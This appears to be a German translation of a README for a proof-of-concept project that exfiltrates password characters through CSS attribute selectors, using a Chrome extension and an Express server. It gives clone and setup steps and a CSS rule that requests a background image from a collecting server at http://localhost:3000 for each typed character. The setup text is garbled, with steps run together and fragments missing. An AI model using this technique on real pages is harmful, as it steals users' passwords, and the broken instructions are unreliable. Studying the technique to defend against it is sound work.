
Chrome-Erweiterung und Express-Server, die die Keylogging-Fähigkeiten von CSS ausnutzen.
Chrome-Erweiterung und Express-Server, die die Keylogging-Fähigkeiten von CSS ausnutzen.
git clone https://github.com/maxchehab/CSS-Keyloggingchrome://extensions in Ihrem Browser auf (oder öffnen Sie das Chrome-Menü, indem Sie auf das Symbol ganz rechts in der Omnibox klicken: Das Menüsymbol besteht aus drei horizontalen Strichen. Wählen Sie dann unter dem Menü 'Weitere Tools' die Option 'Erweiterungen' aus, um zum selben Ort zu gelangen).Entpackte Erweiterung laden…, um einen Dateiauswahldialog zu öffnen.css-keylogger-extension in dem Verzeichnis aus, in das Sie dieses Repository heruntergeladen haben.yarnyarn startC oben rechts auf einer beliebigen Webseite.Dieser Angriff ist wirklich einfach. Durch die Verwendung von CSS-Attributselektoren können Ressourcen von einem externen Server unter dem Vorwand des Ladens eines background-image angefordert werden.
Zum Beispiel wählt das folgende CSS alle Eingabefelder (inputs) mit einem type gleich password und einem value, das mit a endet, aus. Es wird dann versuchen, ein Bild von http://localhost:3000/a zu laden.
input[type="password"][value$="a"] {
background-image: url("http://localhost:3000/a");
}
Mit einem einfachen Skript kann man eine CSS-Datei erstellen, die für jedes ASCII-Zeichen eine benutzerdefinierte Anfrage sendet.